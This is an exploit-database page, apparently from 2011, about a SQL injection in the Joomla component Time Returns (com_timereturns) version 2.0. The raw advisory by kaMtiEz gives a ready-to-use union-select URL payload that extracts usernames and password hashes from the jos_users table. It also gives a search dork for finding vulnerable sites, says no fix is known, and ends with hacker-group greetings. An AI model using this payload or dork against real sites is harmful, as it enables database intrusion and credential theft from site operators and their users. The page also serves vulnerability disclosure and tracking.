header-logo
Suggest Exploit
vendor:
Joomla Component Time Returns (com_timereturns)
by:
kaMtiEz
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla Component Time Returns (com_timereturns)
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability

A SQL injection vulnerability exists in Joomla Component Time Returns (com_timereturns) version 2.0 or lower. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to bypass authentication, access, modify and delete data in the back-end database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#############################################################################################################
## Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability			           ##
## Author : kaMtiEz (kamtiez@exploit-id.com)								   ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id	   ##
## Date : 8 October, 2011 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.takeaweb.it/
[+] Download : http://www.takeaweb.it/index.php?option=com_dms&view=category&layout=table&Itemid=13
[+] version : 2.0 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : - INDONESIA -

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--

[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ] 

[+] Halal Bihalal sukses mas dab :))
[+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-)
[+] Hellcome in MGL jos_ali_joe =))

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..